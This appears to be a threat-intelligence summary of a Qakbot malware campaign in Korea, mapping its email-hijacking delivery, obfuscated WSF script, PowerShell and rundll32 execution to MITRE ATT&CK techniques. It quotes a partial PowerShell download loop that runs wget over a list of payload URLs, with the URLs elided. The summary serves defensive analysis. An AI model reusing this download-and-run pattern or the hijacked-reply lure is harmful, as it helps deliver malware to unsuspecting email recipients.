Qakbot Being Distributed in Korea Through Email Hijacking – ASEC BLOG

MITRE Techniques

• [T1566.001] Phishing: Spearphishing Attachment – The distributed email has the form of a hijacked normal email where a reply is sent to the target user with a malicious file attached to it. “The distributed email has the form of a hijacked normal email where a reply is sent to the target user with a malicious file attached to it.”
• [T1204.002] User Execution: Malicious File – Users are prompted to open the attachment in the forged email, which leads to the next stage. “they include messages that prompt users to open the attachment.”
• [T1027] Obfuscated/Compressed Files and Information – The WSF file contains obfuscated script code with meaningful content after decompression. “Investigation of the WSF file created upon decompression reveals a script code obfuscated among dummy text.”
• [T1059.001] PowerShell – The WSF payload executes via the PowerShell process to fetch and run the Qakbot component. “When the WSF file is executed, an encrypted data command is executed through the PowerShell process. Decrypting this data reveals the following.”
• [T1218.011] Signed Binary Proxy Execution: Rundll32 – The Qakbot binary is downloaded and executed through rundll32.exe. “The Qakbot binary is downloaded … and executed through the rundll32.exe process.”
• [T1105] Ingress Tool Transfer – The Qakbot binary is downloaded from remote URLs as part of the PowerShell sequence. “Start-Sleep -Seconds 2; $Girnie = (…).split(‘,’); foreach ($reflexional in $Girnie) {try {wget $reflexional …;}}”
• [T1071.001] Web Protocols – The malware relies on HTTP/HTTPS requests to fetch the payloads from remote servers. (Referenced via multiple remote URLs used in the PowerShell sequence.)